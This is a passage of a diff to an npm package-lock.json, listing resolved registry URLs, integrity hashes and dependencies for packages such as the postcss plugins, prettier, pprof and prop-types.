"https://registry.npmjs.org/postcss-normalize-display-values/-/postcss-normalize-display-values-6.0.0.tgz", + "integrity": "sha512-Qyt5kMrvy7dJRO3OjF7zkotGfuYALETZE+4lk66sziWSPzlBEt7FrUshV6VLECkI4EN8Z863O6Nci4NXQGNzYw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-positions": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-positions/-/postcss-normalize-positions-6.0.0.tgz", + "integrity": "sha512-mPCzhSV8+30FZyWhxi6UoVRYd3ZBJgTRly4hOkaSifo0H+pjDYcii/aVT4YE6QpOil15a5uiv6ftnY3rm0igPg==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + 
}, + "node_modules/postcss-normalize-repeat-style": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-repeat-style/-/postcss-normalize-repeat-style-6.0.0.tgz", + "integrity": "sha512-50W5JWEBiOOAez2AKBh4kRFm2uhrT3O1Uwdxz7k24aKtbD83vqmcVG7zoIwo6xI2FZ/HDlbrCopXhLeTpQib1A==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-string": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-string/-/postcss-normalize-string-6.0.0.tgz", + "integrity": "sha512-KWkIB7TrPOiqb8ZZz6homet2KWKJwIlysF5ICPZrXAylGe2hzX/HSf4NTX2rRPJMAtlRsj/yfkrWGavFuB+c0w==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-timing-functions": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-timing-functions/-/postcss-normalize-timing-functions-6.0.0.tgz", + "integrity": "sha512-tpIXWciXBp5CiFs8sem90IWlw76FV4oi6QEWfQwyeREVwUy39VSeSqjAT7X0Qw650yAimYW5gkl2Gd871N5SQg==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-unicode": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-unicode/-/postcss-normalize-unicode-6.0.0.tgz", + "integrity": "sha512-ui5crYkb5ubEUDugDc786L/Me+DXp2dLg3fVJbqyAl0VPkAeALyAijF2zOsnZyaS1HyfPuMH0DwyY18VMFVNkg==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-url": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-url/-/postcss-normalize-url-6.0.0.tgz", + "integrity": "sha512-98mvh2QzIPbb02YDIrYvAg4OUzGH7s1ZgHlD3fIdTHLgPLRpv1ZTKJDnSAKr4Rt21ZQFzwhGMXxpXlfrUBKFHw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-normalize-whitespace": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-normalize-whitespace/-/postcss-normalize-whitespace-6.0.0.tgz", + "integrity": "sha512-7cfE1AyLiK0+ZBG6FmLziJzqQCpTQY+8XjMhMAz8WSBSCsCNNUKujgIgjCAmDT3cJ+3zjTXFkoD15ZPsckArVw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-opacity-percentage": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/postcss-opacity-percentage/-/postcss-opacity-percentage-2.0.0.tgz", + "integrity": "sha512-lyDrCOtntq5Y1JZpBFzIWm2wG9kbEdujpNt4NLannF+J9c8CgFIzPa80YQfdza+Y+yFfzbYj/rfoOsYsooUWTQ==", + "dev": true, + "funding": [ + { + "type": "kofi", + "url": "https://ko-fi.com/mrcgrtz" + }, + { + "type": "liberapay", + "url": "https://liberapay.com/mrcgrtz" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.2" + } + }, + "node_modules/postcss-ordered-values": { + "version": "6.0.0", + 
"resolved": "https://registry.npmjs.org/postcss-ordered-values/-/postcss-ordered-values-6.0.0.tgz", + "integrity": "sha512-K36XzUDpvfG/nWkjs6d1hRBydeIxGpKS2+n+ywlKPzx1nMYDYpoGbcjhj5AwVYJK1qV2/SDoDEnHzlPD6s3nMg==", + "dev": true, + "dependencies": { + "cssnano-utils": "^4.0.0", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-overflow-shorthand": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/postcss-overflow-shorthand/-/postcss-overflow-shorthand-4.0.1.tgz", + "integrity": "sha512-HQZ0qi/9iSYHW4w3ogNqVNr2J49DHJAl7r8O2p0Meip38jsdnRPgiDW7r/LlLrrMBMe3KHkvNtAV2UmRVxzLIg==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-page-break": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/postcss-page-break/-/postcss-page-break-3.0.4.tgz", + "integrity": "sha512-1JGu8oCjVXLa9q9rFTo4MbeeA5FMe00/9C7lN4va606Rdb+HkxXtXsmEDrIraQ11fGz/WvKWa8gMuCKkrXpTsQ==", + "dev": true, + "peerDependencies": { + "postcss": "^8" + } + }, + "node_modules/postcss-place": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/postcss-place/-/postcss-place-8.0.1.tgz", + "integrity": "sha512-Ow2LedN8sL4pq8ubukO77phSVt4QyCm35ZGCYXKvRFayAwcpgB0sjNJglDoTuRdUL32q/ZC1VkPBo0AOEr4Uiw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-preset-env": { + "version": "8.5.1", + "resolved": "https://registry.npmjs.org/postcss-preset-env/-/postcss-preset-env-8.5.1.tgz", + "integrity": "sha512-qhWnJJjP6ArLUINWJ38t6Aftxnv9NW6cXK0NuwcLCcRilbuw72dSFLkCVUJeCfHGgJiKzX+pnhkGiki0PEynWg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "dependencies": { + "@csstools/postcss-cascade-layers": "^3.0.1", + "@csstools/postcss-color-function": "^2.2.3", + "@csstools/postcss-color-mix-function": "^1.0.3", + "@csstools/postcss-font-format-keywords": "^2.0.2", + "@csstools/postcss-gradients-interpolation-method": "^3.0.6", + "@csstools/postcss-hwb-function": "^2.2.2", + "@csstools/postcss-ic-unit": "^2.0.4", + "@csstools/postcss-is-pseudo-class": "^3.2.1", + "@csstools/postcss-logical-float-and-clear": "^1.0.1", + "@csstools/postcss-logical-resize": "^1.0.1", + "@csstools/postcss-logical-viewport-units": "^1.0.3", + "@csstools/postcss-media-minmax": "^1.0.4", + "@csstools/postcss-media-queries-aspect-ratio-number-values": "^1.0.4", + "@csstools/postcss-nested-calc": "^2.0.2", + "@csstools/postcss-normalize-display-values": "^2.0.1", + "@csstools/postcss-oklab-function": "^2.2.3", + "@csstools/postcss-progressive-custom-properties": "^2.3.0", + "@csstools/postcss-relative-color-syntax": "^1.0.2", + "@csstools/postcss-scope-pseudo-class": "^2.0.2", + "@csstools/postcss-stepped-value-functions": "^2.1.1", + "@csstools/postcss-text-decoration-shorthand": "^2.2.4", + "@csstools/postcss-trigonometric-functions": "^2.1.1", + "@csstools/postcss-unset-value": 
"^2.0.1", + "autoprefixer": "^10.4.14", + "browserslist": "^4.21.9", + "css-blank-pseudo": "^5.0.2", + "css-has-pseudo": "^5.0.2", + "css-prefers-color-scheme": "^8.0.2", + "cssdb": "^7.6.0", + "postcss-attribute-case-insensitive": "^6.0.2", + "postcss-clamp": "^4.1.0", + "postcss-color-functional-notation": "^5.1.0", + "postcss-color-hex-alpha": "^9.0.2", + "postcss-color-rebeccapurple": "^8.0.2", + "postcss-custom-media": "^9.1.5", + "postcss-custom-properties": "^13.2.0", + "postcss-custom-selectors": "^7.1.3", + "postcss-dir-pseudo-class": "^7.0.2", + "postcss-double-position-gradients": "^4.0.4", + "postcss-focus-visible": "^8.0.2", + "postcss-focus-within": "^7.0.2", + "postcss-font-variant": "^5.0.0", + "postcss-gap-properties": "^4.0.1", + "postcss-image-set-function": "^5.0.2", + "postcss-initial": "^4.0.1", + "postcss-lab-function": "^5.2.3", + "postcss-logical": "^6.2.0", + "postcss-nesting": "^11.3.0", + "postcss-opacity-percentage": "^2.0.0", + "postcss-overflow-shorthand": "^4.0.1", + "postcss-page-break": "^3.0.4", + "postcss-place": "^8.0.1", + "postcss-pseudo-class-any-link": "^8.0.2", + "postcss-replace-overflow-wrap": "^4.0.0", + "postcss-selector-not": "^7.0.1", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-pseudo-class-any-link": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/postcss-pseudo-class-any-link/-/postcss-pseudo-class-any-link-8.0.2.tgz", + "integrity": "sha512-FYTIuRE07jZ2CW8POvctRgArQJ43yxhr5vLmImdKUvjFCkR09kh8pIdlCwdx/jbFm7MiW4QP58L4oOUv3grQYA==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-reduce-initial": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-reduce-initial/-/postcss-reduce-initial-6.0.0.tgz", + "integrity": "sha512-s2UOnidpVuXu6JiiI5U+fV2jamAw5YNA9Fdi/GRK0zLDLCfXmSGqQtzpUPtfN66RtCbb9fFHoyZdQaxOB3WxVA==", + "dev": true, + "dependencies": { + "browserslist": "^4.21.4", + "caniuse-api": "^3.0.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-reduce-transforms": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-reduce-transforms/-/postcss-reduce-transforms-6.0.0.tgz", + "integrity": "sha512-FQ9f6xM1homnuy1wLe9lP1wujzxnwt1EwiigtWwuyf8FsqqXUDUp2Ulxf9A5yjlUOTdCJO6lonYjg1mgqIIi2w==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-replace-overflow-wrap": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/postcss-replace-overflow-wrap/-/postcss-replace-overflow-wrap-4.0.0.tgz", + "integrity": "sha512-KmF7SBPphT4gPPcKZc7aDkweHiKEEO8cla/GjcBK+ckKxiZslIu3C4GCRW3DNfL0o7yW7kMQu9xlZ1kXRXLXtw==", + "dev": true, + "peerDependencies": { + "postcss": "^8.0.3" + } + }, + "node_modules/postcss-reporter": { + "version": "7.0.5", + "resolved": "https://registry.npmjs.org/postcss-reporter/-/postcss-reporter-7.0.5.tgz", + "integrity": "sha512-glWg7VZBilooZGOFPhN9msJ3FQs19Hie7l5a/eE6WglzYqVeH3ong3ShFcp9kDWJT1g2Y/wd59cocf9XxBtkWA==", + "dev": true, + "dependencies": { 
+ "picocolors": "^1.0.0", + "thenby": "^1.3.4" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/postcss-resolve-nested-selector": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/postcss-resolve-nested-selector/-/postcss-resolve-nested-selector-0.1.1.tgz", + "integrity": "sha512-HvExULSwLqHLgUy1rl3ANIqCsvMS0WHss2UOsXhXnQaZ9VCc2oBvIpXrl00IUFT5ZDITME0o6oiXeiHr2SAIfw==", + "dev": true + }, + "node_modules/postcss-safe-parser": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/postcss-safe-parser/-/postcss-safe-parser-7.0.0.tgz", + "integrity": "sha512-ovehqRNVCpuFzbXoTb4qLtyzK3xn3t/CUBxOs8LsnQjQrShaB4lKiHoVqY8ANaC0hBMHq5QVWk77rwGklFUDrg==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/postcss-safe-parser" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "peer": true, + "engines": { + "node": ">=18.0" + }, + "peerDependencies": { + "postcss": "^8.4.31" + } + }, + "node_modules/postcss-scss": { + "version": "4.0.9", + "resolved": "https://registry.npmjs.org/postcss-scss/-/postcss-scss-4.0.9.tgz", + "integrity": "sha512-AjKOeiwAitL/MXxQW2DliT28EKukvvbEWx3LBmJIRN8KfBGZbRTxNYW0kSqi1COiTZ57nZ9NW06S6ux//N1c9A==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/postcss-scss" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "engines": { + "node": ">=12.0" + }, + "peerDependencies": { + "postcss": "^8.4.29" + } + }, + "node_modules/postcss-selector-not": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/postcss-selector-not/-/postcss-selector-not-7.0.1.tgz", + "integrity": "sha512-1zT5C27b/zeJhchN7fP0kBr16Cc61mu7Si9uWWLoA3Px/D9tIJPKchJCkUH3tPO5D0pCFmGeApAv8XpXBQJ8SQ==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/postcss-selector-parser": { + "version": "6.0.16", + "resolved": "https://registry.npmjs.org/postcss-selector-parser/-/postcss-selector-parser-6.0.16.tgz", + "integrity": "sha512-A0RVJrX+IUkVZbW3ClroRWurercFhieevHB38sr2+l9eUClMqome3LmEmnhlNy+5Mr2EYN6B2Kaw9wYdd+VHiw==", + "dev": true, + "dependencies": { + "cssesc": "^3.0.0", + "util-deprecate": "^1.0.2" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/postcss-svgo": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-svgo/-/postcss-svgo-6.0.0.tgz", + "integrity": "sha512-r9zvj/wGAoAIodn84dR/kFqwhINp5YsJkLoujybWG59grR/IHx+uQ2Zo+IcOwM0jskfYX3R0mo+1Kip1VSNcvw==", + "dev": true, + "dependencies": { + "postcss-value-parser": "^4.2.0", + "svgo": "^3.0.2" + }, + "engines": { + "node": "^14 || ^16 || >= 18" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-unique-selectors": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/postcss-unique-selectors/-/postcss-unique-selectors-6.0.0.tgz", + "integrity": 
"sha512-EPQzpZNxOxP7777t73RQpZE5e9TrnCrkvp7AH7a0l89JmZiPnS82y216JowHXwpBCQitfyxrof9TK3rYbi7/Yw==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.5" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/postcss-value-parser": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.2.0.tgz", + "integrity": "sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ==", + "dev": true + }, + "node_modules/postcss/node_modules/nanoid": { + "version": "3.3.7", + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.7.tgz", + "integrity": "sha512-eSRppjcPIatRIMC1U6UngP8XFcz8MQWGQdt1MTBQ7NaAmvXDfvNxbvWV3x2y6CdEUciCSsDHDQZbhYaB8QEo2g==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "bin": { + "nanoid": "bin/nanoid.cjs" + }, + "engines": { + "node": "^10 || ^12 || ^13.7 || ^14 || >=15.0.1" + } + }, + "node_modules/postgres-array": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/postgres-array/-/postgres-array-2.0.0.tgz", + "integrity": "sha512-VpZrUqU5A69eQyW2c5CA1jtLecCsN2U/bD6VilrFDWq5+5UIEVO7nazS3TEcHf1zuPYO/sqGvUvW62g86RXZuA==", + "engines": { + "node": ">=4" + } + }, + "node_modules/postgres-bytea": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/postgres-bytea/-/postgres-bytea-1.0.0.tgz", + "integrity": "sha1-AntTPAqokOJtFy1Hz5zOzFIazTU=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/postgres-date": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/postgres-date/-/postgres-date-1.0.7.tgz", + "integrity": "sha512-suDmjLVQg78nMK2UZ454hAG+OAW+HQPZ6n++TNDUX+L0+uUlLywnoxJKDou51Zm+zTCjrCl0Nq6J9C5hP9vK/Q==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/postgres-interval": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/postgres-interval/-/postgres-interval-1.2.0.tgz", + "integrity": "sha512-9ZhXKM/rw350N1ovuWHbGxnGh/SNJ4cnxHiM0rxE4VN41wsg8P8zWn9hv/buK00RP4WvlOyr/RBDiptyxVbkZQ==", + "dependencies": { + "xtend": "^4.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/pprof": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/pprof/-/pprof-3.2.1.tgz", + "integrity": "sha512-KnextTM3EHQ2zqN8fUjB0VpE+njcVR7cOfo7DjJSLKzIbKTPelDtokI04ScR/Vd8CLDj+M99tsaKV+K6FHzpzA==", + "hasInstallScript": true, + "dependencies": { + "@mapbox/node-pre-gyp": "^1.0.0", + "bindings": "^1.2.1", + "delay": "^5.0.0", + "findit2": "^2.2.3", + "nan": "^2.14.0", + "p-limit": "^3.0.0", + "pify": "^5.0.0", + "protobufjs": "~7.2.4", + "source-map": "^0.7.3", + "split": "^1.0.1" + }, + "engines": { + "node": ">=10.4.1" + } + }, + "node_modules/pprof/node_modules/pify": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/pify/-/pify-5.0.0.tgz", + "integrity": "sha512-eW/gHNMlxdSP6dmG6uJip6FXN0EQBwm2clYYd8Wul42Cwu/DK8HEftzsapcNdYe2MfLiIwZqsDk2RDEsTE79hA==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/pprof/node_modules/source-map": { + "version": "0.7.4", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.7.4.tgz", + "integrity": "sha512-l3BikUxvPOcn5E74dZiq5BGsTb5yEwhaTSzccU6t4sDOH8NWJCstKO5QT2CvtFoK6F0saL7p9xHAqHOlCPJygA==", + "engines": { + "node": ">= 8" + } + }, + "node_modules/precond": { + "version": "0.2.3", + "resolved": 
"https://registry.npmjs.org/precond/-/precond-0.2.3.tgz", + "integrity": "sha1-qpWRvKokkj8eD0hJ0kD0fvwQdaw=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/prelude-ls": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", + "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/prettier": { + "version": "3.3.3", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.3.3.tgz", + "integrity": "sha512-i2tDNA0O5IrMO757lfrdQZCc2jPNDVntV0m/+4whiDfWaTKfMNgR7Qz0NAeGz/nRqF4m5/6CLzbP4/liHt12Ew==", + "dev": true, + "bin": { + "prettier": "bin/prettier.cjs" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/prettier/prettier?sponsor=1" + } + }, + "node_modules/prettier-linter-helpers": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/prettier-linter-helpers/-/prettier-linter-helpers-1.0.0.tgz", + "integrity": "sha512-GbK2cP9nraSSUF9N2XwUwqfzlAFlMNYYl+ShE/V+H8a9uNl/oUqB1w2EL54Jh0OlyRSd8RfWYJ3coVS4TROP2w==", + "dev": true, + "dependencies": { + "fast-diff": "^1.1.2" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/pretty-bytes": { + "version": "5.6.0", + "resolved": "https://registry.npmjs.org/pretty-bytes/-/pretty-bytes-5.6.0.tgz", + "integrity": "sha512-FFw039TmrBqFK8ma/7OL3sDz/VytdtJr044/QUJtH0wK9lb9jLq9tJyIxUwtQJHwar2BqtiA4iCWSwo9JLkzFg==", + "dev": true, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/pretty-error": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/pretty-error/-/pretty-error-4.0.0.tgz", + "integrity": "sha512-AoJ5YMAcXKYxKhuJGdcvse+Voc6v1RgnsR3nWcYU7q4t6z0Q6T86sv5Zq8VIRbOWWFpvdGE83LtdSMNd+6Y0xw==", + "dev": true, + "dependencies": { + "lodash": "^4.17.20", + "renderkid": "^3.0.0" + } + }, + "node_modules/pretty-format": { + "version": "27.5.1", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-27.5.1.tgz", + "integrity": "sha512-Qb1gy5OrP5+zDf2Bvnzdl3jsTf1qXVMazbvCoKhtKqVs4/YK4ozX4gKQJJVyNe+cajNPn0KoC0MC3FUmaHWEmQ==", + "dev": true, + "dependencies": { + "ansi-regex": "^5.0.1", + "ansi-styles": "^5.0.0", + "react-is": "^17.0.1" + }, + "engines": { + "node": "^10.13.0 || ^12.13.0 || ^14.15.0 || >=15.0.0" + } + }, + "node_modules/pretty-format/node_modules/ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", + "dev": true, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/pretty-ms": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/pretty-ms/-/pretty-ms-7.0.1.tgz", + "integrity": "sha512-973driJZvxiGOQ5ONsFhOF/DtzPMOMtgC11kCpUrPGMTgqp2q/1gwzCquocrN33is0VZ5GFHXZYMM9l6h67v2Q==", + "dependencies": { + "parse-ms": "^2.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/private": { + "version": "0.1.8", + "resolved": "https://registry.npmjs.org/private/-/private-0.1.8.tgz", + "integrity": "sha512-VvivMrbvd2nKkiG38qjULzlc+4Vx4wm/whI9pQD35YrARNnhxeiRktSOhSukRLFNlzg6Br/cJPet5J/u19r/mg==", + "dev": true, + "engines": { + "node": ">= 0.6" + } + }, + 
"node_modules/process": { + "version": "0.11.10", + "resolved": "https://registry.npmjs.org/process/-/process-0.11.10.tgz", + "integrity": "sha1-czIwDoQBYb2j5podHZGn1LwW8YI=", + "engines": { + "node": ">= 0.6.0" + } + }, + "node_modules/process-nextick-args": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", + "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" + }, + "node_modules/progress": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/progress/-/progress-2.0.3.tgz", + "integrity": "sha512-7PiHtLll5LdnKIMw100I+8xJXR5gW2QwWYkT6iJva0bXitZKa/XMrSbdmg3r2Xnaidz9Qumd0VPaMrZlF9V9sA==", + "dev": true, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/prom-client": { + "version": "14.1.1", + "resolved": "https://registry.npmjs.org/prom-client/-/prom-client-14.1.1.tgz", + "integrity": "sha512-hFU32q7UZQ59bVJQGUtm3I2PrJ3gWvoCkilX9sF165ks1qflhugVCeK+S1JjJYHvyt3o5kj68+q3bchormjnzw==", + "dependencies": { + "tdigest": "^0.1.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/promise": { + "version": "7.3.1", + "resolved": "https://registry.npmjs.org/promise/-/promise-7.3.1.tgz", + "integrity": "sha512-nolQXZ/4L+bP/UGlkfaIujX9BKxGwmQ9OT4mOt5yvy8iK1h3wqTEJCijzGANTCCl9nWjY41juyAn2K3Q1hLLTg==", + "dependencies": { + "asap": "~2.0.3" + } + }, + "node_modules/promise-breaker": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/promise-breaker/-/promise-breaker-6.0.0.tgz", + "integrity": "sha512-BthzO9yTPswGf7etOBiHCVuugs2N01/Q/94dIPls48z2zCmrnDptUUZzfIb+41xq0MnYZ/BzmOd6ikDR4ibNZA==" + }, + "node_modules/promise.prototype.finally": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/promise.prototype.finally/-/promise.prototype.finally-3.1.3.tgz", + "integrity": "sha512-EXRF3fC9/0gz4qkt/f5EP5iW4kj9oFpBICNpCNOb/52+8nlHIX07FPLbi/q4qYBQ1xZqivMzTpNQSnArVASolQ==", + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.3", + "es-abstract": "^1.19.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/promptly": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/promptly/-/promptly-3.2.0.tgz", + "integrity": "sha512-WnR9obtgW+rG4oUV3hSnNGl1pHm3V1H/qD9iJBumGSmVsSC5HpZOLuu8qdMb6yCItGfT7dcRszejr/5P3i9Pug==", + "dependencies": { + "read": "^1.0.4" + } + }, + "node_modules/prompts": { + "version": "2.4.2", + "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", + "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "kleur": "^3.0.3", + "sisteransi": "^1.0.5" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/prompts/node_modules/kleur": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", + "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/prop-types": { + "version": "15.8.1", + "resolved": "https://registry.npmjs.org/prop-types/-/prop-types-15.8.1.tgz", + "integrity": "sha512-oj87CgZICdulUohogVAR7AjlC0327U4el4L6eAvOqCeudMDVU0NThNaV+b9Df4dXgSP1gXMTnPdhfe/2qDH5cg==", + "dependencies": { + "loose-envify": "^1.4.0", + "object-assign": "^4.1.1", + "react-is": "^16.13.1" + } + }, + 
